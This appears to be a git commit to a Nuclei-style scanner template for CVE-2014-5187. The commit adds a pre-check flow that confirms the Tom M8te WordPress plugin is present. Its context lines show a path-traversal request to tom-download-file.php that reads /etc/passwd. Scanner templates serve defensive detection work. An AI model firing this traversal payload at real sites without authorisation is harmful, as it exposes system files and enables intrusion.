added-flow

2024-09-06 12:16:05 +05:30 · 2024-09-06 12:16:05 +05:30 · 0fc9ef43b8
parent ab5f72856a
commit 0fc9ef43b8
1 changed files with 15 additions and 0 deletions
--- a/http/cves/2014/CVE-2014-5187.yaml
+++ b/http/cves/2014/CVE-2014-5187.yaml
@ -26,7 +26,22 @@ info:
    publicwww-query: "/wp-content/plugins/tom-m8te/"
  tags: wpscan,cve,cve2014,wp-cross-rss,wordpress,wp-plugin,lfi,wp,tom-m8te

+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"/wp-content/plugins/tom-m8te/")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
  - raw:
      - |
        GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1